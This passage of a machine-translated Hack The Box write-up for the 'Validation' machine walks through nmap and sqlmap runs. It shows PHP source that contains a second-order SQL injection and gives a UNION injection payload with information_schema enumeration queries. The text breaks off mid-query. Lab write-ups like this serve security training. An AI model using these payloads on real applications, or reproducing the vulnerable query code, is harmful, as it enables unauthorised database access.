{"componentChunkName":"component---src-templates-post-template-js","path":"/hackthebox-linux-validation-en","result":{"data":{"markdownRemark":{"id":"724734e7-f559-52f6-86b6-5d3ddde112dc","html":"<blockquote>\n<p>This page has been machine-translated from the <a href=\"/hackthebox-linux-validation\">original page</a>.</p>\n</blockquote>\n<p>I study security using a penetration-testing training platform called Hack The Box.\nAt the time of writing, my Hack The Box rank is ProHacker.</p>\n<img src=\"http://www.hackthebox.eu/badge/image/327080\" alt=\"Hack The Box\">\n<p>This time, I am writing up the retired HackTheBox machine “Validation.”</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 701px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/f4631b855d7057f68e6f602c11d0ae03/49217/image-71.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 74.58333333333333%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/f4631b855d7057f68e6f602c11d0ae03/8ac56/image-71.webp 240w,\n/static/f4631b855d7057f68e6f602c11d0ae03/d3be9/image-71.webp 480w,\n/static/f4631b855d7057f68e6f602c11d0ae03/e2a71/image-71.webp 701w\"\n              sizes=\"(max-width: 701px) 100vw, 701px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/f4631b855d7057f68e6f602c11d0ae03/8ff5a/image-71.png 240w,\n/static/f4631b855d7057f68e6f602c11d0ae03/e85cb/image-71.png 480w,\n/static/f4631b855d7057f68e6f602c11d0ae03/49217/image-71.png 701w\"\n            sizes=\"(max-width: 701px) 100vw, 701px\"\n    
        type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/f4631b855d7057f68e6f602c11d0ae03/49217/image-71.png\"\n            alt=\"image-71.png\"\n            title=\"image-71.png\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h2 id=\"about-this-article\" style=\"position:relative;\"><a href=\"#about-this-article\" aria-label=\"about this article permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>About This Article</h2>\n<p><strong>The content of this article is not intended to encourage actions that violate social order.</strong></p>\n<p>Please note in advance that attempting attacks against any environment other than one you own or have been explicitly authorized to test may violate applicable laws.</p>\n<p>All statements here are my own and do not represent any organization I belong to.</p>\n<!-- omit in toc -->\n<h2 id=\"table-of-contents\" style=\"position:relative;\"><a href=\"#table-of-contents\" aria-label=\"table of contents permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 
9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Table of Contents</h2>\n<ul>\n<li><a href=\"#enumeration\">Enumeration</a></li>\n<li>\n<p><a href=\"#sqli\">SQLi</a></p>\n<ul>\n<li><a href=\"#second-order-sql-injection\">Second-Order SQL Injection</a></li>\n<li><a href=\"#union-injection\">UNION Injection</a></li>\n</ul>\n</li>\n<li><a href=\"#privilege-escalation\">Privilege Escalation</a></li>\n<li><a href=\"#conclusion\">Conclusion</a></li>\n</ul>\n<h2 id=\"enumeration\" style=\"position:relative;\"><a href=\"#enumeration\" aria-label=\"enumeration permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Enumeration</h2>\n<p>As usual, I started with the standard scan.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">Starting Nmap <span class=\"token number\">7.92</span> <span class=\"token punctuation\">(</span> https://nmap.org <span class=\"token punctuation\">)</span> at <span class=\"token number\">2021</span>-10-28 <span class=\"token number\">22</span>:29 JST\nWarning: <span class=\"token number\">10.10</span>.11.116 giving up on port because retransmission cap hit <span class=\"token punctuation\">(</span><span class=\"token number\">6</span><span class=\"token punctuation\">)</span>.\nNmap scan report <span class=\"token keyword\">for</span> <span class=\"token 
variable\">$RHOST</span> <span class=\"token punctuation\">(</span><span class=\"token number\">10.10</span>.11.116<span class=\"token punctuation\">)</span>\nHost is up <span class=\"token punctuation\">(</span><span class=\"token number\">0</span>.40s latency<span class=\"token punctuation\">)</span>.\nNot shown: <span class=\"token number\">992</span> closed tcp ports <span class=\"token punctuation\">(</span>conn-refused<span class=\"token punctuation\">)</span>\nPORT     STATE    SERVICE       VERSION\n<span class=\"token number\">22</span>/tcp   <span class=\"token function\">open</span>     <span class=\"token function\">ssh</span>           OpenSSH <span class=\"token number\">8</span>.2p1 Ubuntu 4ubuntu0.3 <span class=\"token punctuation\">(</span>Ubuntu Linux<span class=\"token punctuation\">;</span> protocol <span class=\"token number\">2.0</span><span class=\"token punctuation\">)</span>\n<span class=\"token operator\">|</span> ssh-hostkey: \n<span class=\"token operator\">|</span>   <span class=\"token number\">3072</span> d8:f5:ef:d2:d3:f9:8d:ad:c6:cf:24:85:94:26:ef:7a <span class=\"token punctuation\">(</span>RSA<span class=\"token punctuation\">)</span>\n<span class=\"token operator\">|</span>   <span class=\"token number\">256</span> <span class=\"token number\">46</span>:3d:6b:cb:a8:19:eb:6a:d0:68:86:94:86:73:e1:72 <span class=\"token punctuation\">(</span>ECDSA<span class=\"token punctuation\">)</span>\n<span class=\"token operator\">|</span>_  <span class=\"token number\">256</span> <span class=\"token number\">70</span>:32:d7:e3:77:c1:4a:cf:47:2a:de:e5:08:7a:f8:7a <span class=\"token punctuation\">(</span>ED25519<span class=\"token punctuation\">)</span>\n<span class=\"token number\">80</span>/tcp   <span class=\"token function\">open</span>     http          Apache httpd <span class=\"token number\">2.4</span>.48 <span class=\"token variable\"><span class=\"token punctuation\">((</span>Debian<span class=\"token 
punctuation\">))</span></span>\n<span class=\"token operator\">|</span>_http-title: Site doesn't have a title <span class=\"token punctuation\">(</span>text/html<span class=\"token punctuation\">;</span> <span class=\"token assign-left variable\">charset</span><span class=\"token operator\">=</span>UTF-8<span class=\"token punctuation\">)</span>.\n<span class=\"token operator\">|</span>_http-server-header: Apache/2.4.48 <span class=\"token punctuation\">(</span>Debian<span class=\"token punctuation\">)</span>\n<span class=\"token number\">5000</span>/tcp filtered upnp\n<span class=\"token number\">5001</span>/tcp filtered commplex-link\n<span class=\"token number\">5002</span>/tcp filtered rfe\n<span class=\"token number\">5003</span>/tcp filtered filemaker\n<span class=\"token number\">5004</span>/tcp filtered avt-profile-1\n<span class=\"token number\">8080</span>/tcp <span class=\"token function\">open</span>     http          nginx\n<span class=\"token operator\">|</span>_http-title: <span class=\"token number\">502</span> Bad Gateway\nService Info: OS: Linux<span class=\"token punctuation\">;</span> CPE: cpe:/o:linux:linux_kernel\n\nService detection performed. 
Please report any incorrect results at https://nmap.org/submit/ <span class=\"token builtin class-name\">.</span>\nNmap done: <span class=\"token number\">1</span> IP address <span class=\"token punctuation\">(</span><span class=\"token number\">1</span> <span class=\"token function\">host</span> up<span class=\"token punctuation\">)</span> scanned <span class=\"token keyword\">in</span> <span class=\"token number\">137.03</span> seconds</code></pre></div>\n<p>A somewhat mysterious web application was running on port 80.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 824px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/78e7457e76ed057957b5367ccf27cb3d/c1c45/image-72.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 74.58333333333333%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/78e7457e76ed057957b5367ccf27cb3d/8ac56/image-72.webp 240w,\n/static/78e7457e76ed057957b5367ccf27cb3d/d3be9/image-72.webp 480w,\n/static/78e7457e76ed057957b5367ccf27cb3d/5758c/image-72.webp 824w\"\n              sizes=\"(max-width: 824px) 100vw, 824px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/78e7457e76ed057957b5367ccf27cb3d/8ff5a/image-72.png 240w,\n/static/78e7457e76ed057957b5367ccf27cb3d/e85cb/image-72.png 480w,\n/static/78e7457e76ed057957b5367ccf27cb3d/c1c45/image-72.png 824w\"\n            sizes=\"(max-width: 824px) 100vw, 824px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            
src=\"/static/78e7457e76ed057957b5367ccf27cb3d/c1c45/image-72.png\"\n            alt=\"image-72.png\"\n            title=\"image-72.png\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>It seemed to be an application that registers a user as soon as you POST a username and a country, then shows the other users registered from the same country.</p>\n<p>Since the application stored the submitted values and later read them back to build that list, I continued the investigation on the assumption that SQLi might be possible somewhere along that path.</p>\n<p>There was also an XSS vulnerability, but it was the kind that did not lead to a shell, so I ignored it.</p>\n<h2 id=\"sqli\" style=\"position:relative;\"><a href=\"#sqli\" aria-label=\"sqli permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>SQLi</h2>\n<p>I tried running sqlmap as a test, but both <code class=\"language-text\">username</code> and <code class=\"language-text\">country</code> came back as <code class=\"language-text\">does not seem to be injectable</code>.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">python3 sqlmap.py -u <span class=\"token string\">\"http://<span class=\"token variable\">$RHOST</span>/\"</span> --data <span class=\"token string\">\"username=test&amp;country=Ukraine\"</span></code></pre></div>\n<p>So the registration form itself handles its inputs safely (it uses prepared statements, as the source below shows), which is why sqlmap's first-order tests find nothing: the request that carries the payload is not the request in which the payload is executed.</p>\n<h3 
id=\"second-order-sql-injection\" style=\"position:relative;\"><a href=\"#second-order-sql-injection\" aria-label=\"second order sql injection permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Second-Order SQL Injection</h3>\n<p>This application has a second-order SQL injection vulnerability.</p>\n<p>Reference: <a href=\"https://gallu.hatenadiary.jp/entry/20060105/p1\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">second-order SQL injection - Garu’s Memorandum</a></p>\n<p>In practice, the application was doing something like the following behind the scenes.</p>\n<div class=\"gatsby-highlight\" data-language=\"php\"><pre class=\"language-php\"><code class=\"language-php\"><span class=\"token php language-php\"><span class=\"token delimiter important\">&lt;?php</span>\n  <span class=\"token keyword\">require</span><span class=\"token punctuation\">(</span><span class=\"token string single-quoted-string\">'config.php'</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span> <span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span><span class=\"token string single-quoted-string\">'REQUEST_METHOD'</span><span class=\"token punctuation\">]</span> <span class=\"token operator\">==</span> <span class=\"token string single-quoted-string\">'POST'</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n    
<span class=\"token variable\">$userhash</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span><span class=\"token string single-quoted-string\">'username'</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token variable\">$sql</span> <span class=\"token operator\">=</span> <span class=\"token string double-quoted-string\">\"INSERT INTO registration (username, userhash, country, regtime) VALUES (?, ?, ?, ?)\"</span><span class=\"token punctuation\">;</span>\n    <span class=\"token variable\">$stmt</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$conn</span><span class=\"token operator\">-></span><span class=\"token function\">prepare</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$sql</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token variable\">$stmt</span><span class=\"token operator\">-></span><span class=\"token function\">bind_param</span><span class=\"token punctuation\">(</span><span class=\"token string double-quoted-string\">\"sssi\"</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span><span class=\"token string single-quoted-string\">'username'</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$userhash</span> <span class=\"token punctuation\">,</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span><span class=\"token string single-quoted-string\">'country'</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token 
function\">time</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span><span class=\"token variable\">$stmt</span><span class=\"token operator\">-></span><span class=\"token function\">execute</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span><span class=\"token punctuation\">;</span>\n            <span class=\"token function\">setcookie</span><span class=\"token punctuation\">(</span><span class=\"token string single-quoted-string\">'user'</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$userhash</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n            <span class=\"token function\">header</span><span class=\"token punctuation\">(</span><span class=\"token string double-quoted-string\">\"Location: /account.php\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n            <span class=\"token keyword\">exit</span><span class=\"token punctuation\">;</span>\n    <span class=\"token punctuation\">}</span>\n    <span class=\"token variable\">$sql</span> <span class=\"token operator\">=</span> <span class=\"token string double-quoted-string\">\"update registration set country = ? 
where username = ?\"</span><span class=\"token punctuation\">;</span>\n    <span class=\"token variable\">$stmt</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$conn</span><span class=\"token operator\">-></span><span class=\"token function\">prepare</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$sql</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token variable\">$stmt</span><span class=\"token operator\">-></span><span class=\"token function\">bind_param</span><span class=\"token punctuation\">(</span><span class=\"token string double-quoted-string\">\"ss\"</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span><span class=\"token string single-quoted-string\">'country'</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span><span class=\"token string single-quoted-string\">'username'</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token variable\">$stmt</span><span class=\"token operator\">-></span><span class=\"token function\">execute</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token function\">setcookie</span><span class=\"token punctuation\">(</span><span class=\"token string single-quoted-string\">'user'</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$userhash</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token function\">header</span><span class=\"token punctuation\">(</span><span class=\"token string 
double-quoted-string\">\"Location: /account.php\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token keyword\">exit</span><span class=\"token punctuation\">;</span>\n  <span class=\"token punctuation\">}</span>\n<span class=\"token delimiter important\">?></span></span></code></pre></div>\n<p>It stores the POSTed values through bound parameters, sets a <code class=\"language-text\">user</code> cookie equal to the MD5 of the username, and redirects to <code class=\"language-text\">/account.php</code>. If the INSERT fails (the username is already registered) it falls through to the UPDATE branch instead, so re-submitting the same username simply overwrites that row's <code class=\"language-text\">country</code>, which is convenient when iterating on payloads. <code class=\"language-text\">account.php</code> then looks like this:</p>\n<div class=\"gatsby-highlight\" data-language=\"php\"><pre class=\"language-php\"><code class=\"language-php\"><span class=\"token php language-php\"><span class=\"token delimiter important\">&lt;?php</span> \n  <span class=\"token keyword\">include</span><span class=\"token punctuation\">(</span><span class=\"token string single-quoted-string\">'config.php'</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_COOKIE</span><span class=\"token punctuation\">[</span><span class=\"token string single-quoted-string\">'user'</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">;</span>\n  <span class=\"token variable\">$sql</span> <span class=\"token operator\">=</span> <span class=\"token string double-quoted-string\">\"SELECT username, country FROM registration WHERE userhash = ?\"</span><span class=\"token punctuation\">;</span>\n  <span class=\"token variable\">$stmt</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$conn</span><span class=\"token operator\">-></span><span class=\"token function\">prepare</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$sql</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token variable\">$stmt</span><span class=\"token 
operator\">-></span><span class=\"token function\">bind_param</span><span class=\"token punctuation\">(</span><span class=\"token string double-quoted-string\">\"s\"</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$user</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token variable\">$stmt</span><span class=\"token operator\">-></span><span class=\"token function\">execute</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  \n  <span class=\"token variable\">$result</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$stmt</span><span class=\"token operator\">-></span><span class=\"token function\">get_result</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span> <span class=\"token comment\">// get the mysqli result</span>\n  <span class=\"token variable\">$row</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$result</span><span class=\"token operator\">-></span><span class=\"token function\">fetch_assoc</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span> <span class=\"token comment\">// fetch data   </span>\n  <span class=\"token keyword\">echo</span> <span class=\"token string single-quoted-string\">'&lt;h1 class=\"text-white\">Welcome '</span> <span class=\"token operator\">.</span> <span class=\"token variable\">$row</span><span class=\"token punctuation\">[</span><span class=\"token string single-quoted-string\">'username'</span><span class=\"token punctuation\">]</span> <span class=\"token operator\">.</span> <span class=\"token string single-quoted-string\">'&lt;/h1>'</span><span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">echo</span> <span 
class=\"token string single-quoted-string\">'&lt;h3 class=\"text-white\">Other Players In '</span> <span class=\"token operator\">.</span> <span class=\"token variable\">$row</span><span class=\"token punctuation\">[</span><span class=\"token string single-quoted-string\">'country'</span><span class=\"token punctuation\">]</span> <span class=\"token operator\">.</span> <span class=\"token string single-quoted-string\">'&lt;/h3>'</span><span class=\"token punctuation\">;</span>\n  <span class=\"token variable\">$sql</span> <span class=\"token operator\">=</span> <span class=\"token string double-quoted-string\">\"SELECT username FROM registration WHERE country = '\"</span> <span class=\"token operator\">.</span> <span class=\"token variable\">$row</span><span class=\"token punctuation\">[</span><span class=\"token string single-quoted-string\">'country'</span><span class=\"token punctuation\">]</span> <span class=\"token operator\">.</span> <span class=\"token string double-quoted-string\">\"'\"</span><span class=\"token punctuation\">;</span>\n  <span class=\"token variable\">$result</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$conn</span><span class=\"token operator\">-></span><span class=\"token function\">query</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$sql</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">while</span> <span class=\"token punctuation\">(</span><span class=\"token variable\">$row</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$result</span><span class=\"token operator\">-></span><span class=\"token function\">fetch_assoc</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n    <span class=\"token keyword\">echo</span> <span class=\"token string 
double-quoted-string\">\"&lt;li class='text-white'>\"</span> <span class=\"token operator\">.</span> <span class=\"token variable\">$row</span><span class=\"token punctuation\">[</span><span class=\"token string single-quoted-string\">'username'</span><span class=\"token punctuation\">]</span> <span class=\"token operator\">.</span> <span class=\"token string double-quoted-string\">\"&lt;/li>\"</span><span class=\"token punctuation\">;</span>\n  <span class=\"token punctuation\">}</span>\n<span class=\"token delimiter important\">?></span></span></code></pre></div>\n<p>In the input form in <code class=\"language-text\">index.php</code>, the SQL query used placeholders. However, the part in <code class=\"language-text\">account.php</code> that retrieved the user and country did not use placeholders.</p>\n<p>For that reason, a second-order SQL injection vulnerability exists.</p>\n<p>So, if you put <code class=\"language-text\">'</code> in the Country input field at the time of the redirect, <code class=\"language-text\">Faital Error</code> appears in the browser, which tells us SQLi is likely possible.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/bbab3fe536e329528e641f802c96bf88/2bef9/image-73-1024x651.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 63.74999999999999%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/bbab3fe536e329528e641f802c96bf88/8ac56/image-73-1024x651.webp 
240w,\n/static/bbab3fe536e329528e641f802c96bf88/d3be9/image-73-1024x651.webp 480w,\n/static/bbab3fe536e329528e641f802c96bf88/e46b2/image-73-1024x651.webp 960w,\n/static/bbab3fe536e329528e641f802c96bf88/a9a89/image-73-1024x651.webp 1024w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/bbab3fe536e329528e641f802c96bf88/8ff5a/image-73-1024x651.png 240w,\n/static/bbab3fe536e329528e641f802c96bf88/e85cb/image-73-1024x651.png 480w,\n/static/bbab3fe536e329528e641f802c96bf88/d9199/image-73-1024x651.png 960w,\n/static/bbab3fe536e329528e641f802c96bf88/2bef9/image-73-1024x651.png 1024w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/bbab3fe536e329528e641f802c96bf88/d9199/image-73-1024x651.png\"\n            alt=\"image-73-1024x651.png\"\n            title=\"image-73-1024x651.png\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h3 id=\"union-injection\" style=\"position:relative;\"><a href=\"#union-injection\" aria-label=\"union injection permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>UNION Injection</h3>\n<p>So I went ahead and actually performed the SQLi.</p>\n<p>As you can also tell from the earlier Burp test, the injected query runs, but nothing it returns is shown: <code class=\"language-text\">account.php</code> only prints the <code class=\"language-text\">username</code> column of the country query, one <code class=\"language-text\">&lt;li></code> per row, so the data we want has to end up in that column.</p>\n<p>So I used a technique called UNION injection.</p>\n<p>UNION injection appends a <code class=\"language-text\">UNION SELECT</code> to the existing query so that the rows of an arbitrary second query are returned together with (or instead of) the original rows. The injected SELECT has to return the same number of columns as the original, which here is exactly one, and every row it returns is echoed as an <code class=\"language-text\">&lt;li></code>.</p>\n<p>Registering with the following <code class=\"language-text\">country</code> value stores the payload; it fires when <code class=\"language-text\">/account.php</code> reads the country back and builds its second query from it (the <code class=\"language-text\">-- -</code> comments out the closing quote of the original query).</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token assign-left variable\">country</span><span class=\"token operator\">=</span>Brazil<span class=\"token string\">' UNION SELECT 1;-- -'</span><span class=\"token punctuation\">;</span></code></pre></div>\n<p>Reference: <a href=\"https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/#UnionInjections\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">SQL Injection Cheat Sheet | Netsparker</a></p>\n<p>From here, I used UNION injection to enumerate and exploit the database. Each query below goes in the slot occupied by <code class=\"language-text\">SELECT 1</code> above; multi-row results come back as one <code class=\"language-text\">&lt;li></code> per row, and multi-column data has to be packed into the single column with <code class=\"language-text\">concat()</code> or <code class=\"language-text\">group_concat()</code>.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">-- Display the DB username\n<span class=\"token keyword\">select</span> user<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n\n-- Database name\n<span class=\"token keyword\">select</span> database<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n\n-- Enumerate schemas\n<span class=\"token keyword\">select</span> schema_name from information_schema.schemata\n\n-- Get tables <span class=\"token punctuation\">(</span>filter on the schema, i.e. the database name<span class=\"token punctuation\">)</span>\n<span class=\"token keyword\">select</span> table_name from information_schema.tables where table_schema <span class=\"token operator\">=</span> <span class=\"token string\">'&lt;database name>'</span>\n\n-- Get <span class=\"token function\">column</span> information\n<span class=\"token keyword\">select</span> column_name from information_schema.columns where table_name <span class=\"token 